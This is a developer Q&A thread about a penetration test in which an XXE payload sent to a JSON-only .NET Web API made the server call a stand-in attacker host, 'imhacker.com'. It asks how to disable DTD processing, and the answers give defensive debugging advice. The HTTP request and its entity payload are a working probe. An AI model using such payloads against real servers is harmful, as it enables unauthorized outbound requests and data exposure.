# Web Api XXE(Xml eXternal Entity) injection despite not allowing XML

Tags: .net, asp.net-web-api, xxe

We had a test conducted in our company to find out potential security vulnerabilities.
We have a .NET Web API solution and only json is supported in our requests. The test conducted was as follows:
A post request was made on an api endpoint with an xml in the body. The xml had a url pointing to the hackers server. Something like this

```
POST <url> HTTP/1.1
Content-Type: text/xml
Accept : */*
Cache-Control : no-cache
Host: <hostname>
Accept-encoding : gzip, deflate
Connection: close
Content-Length : 128

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test[
  <!ENTITY & one SYSTEM "https://imhacker.com/XXE" >
  %one;

]>
```

The api did give a response:
{"Message" : "The request entity's media type 'text/xml' is not supported for this resource."}

However the tester who was monitoring traffic on the server imhacker did see request https://imhacker.com/XXE come through
So I have 2 questions:

1. How did this request execute despite the response saying that xml is not supported
2. What is the solution? I have seen some recommendations that say:
   Prohibit or Ignore DTD processing. How do I apply this to all endpoints in the web api

Also I have seen some people recommending to remove the XMLFormatter but my code already does a Clear on all formatters and readds a customized json formatter only

Comment: How the API is hosted?

Comment: Its a .net web api solution hosted in AWS

Answer (score 0):

In .NET 4.5.2 and newer XXE processing is disabled by default. If you are using lower target framework version, you should upgrade. Otherwise this means that some code which sits before Web API in the pipeline reads the request and explicitly enables XXE. You can try to add a function breakpoint to `System.Xml.XmlUrlResolver.GetEntity` and send that request to see where exactly this happens.

Comment: Thanks for your response. Aplogies for responding late. FYI, we do not expect any xml requests. All the requests are json
I have two question:
1. Where in the pipeline, XXE is explicitly enabled (as per your response) ?. I have currently inserted a custom handler at the start of the pipeline. It is of type DelegatingHandler. 

config.MessageHandlers.Insert(0, new RequestValidationHandler());

I try to parse json . If it fails I throw a 400 error. Not sure if that will work (we still need to retest)

2.I do not understand your suggestion, about debugging with XMLUrlResolver.GetEntity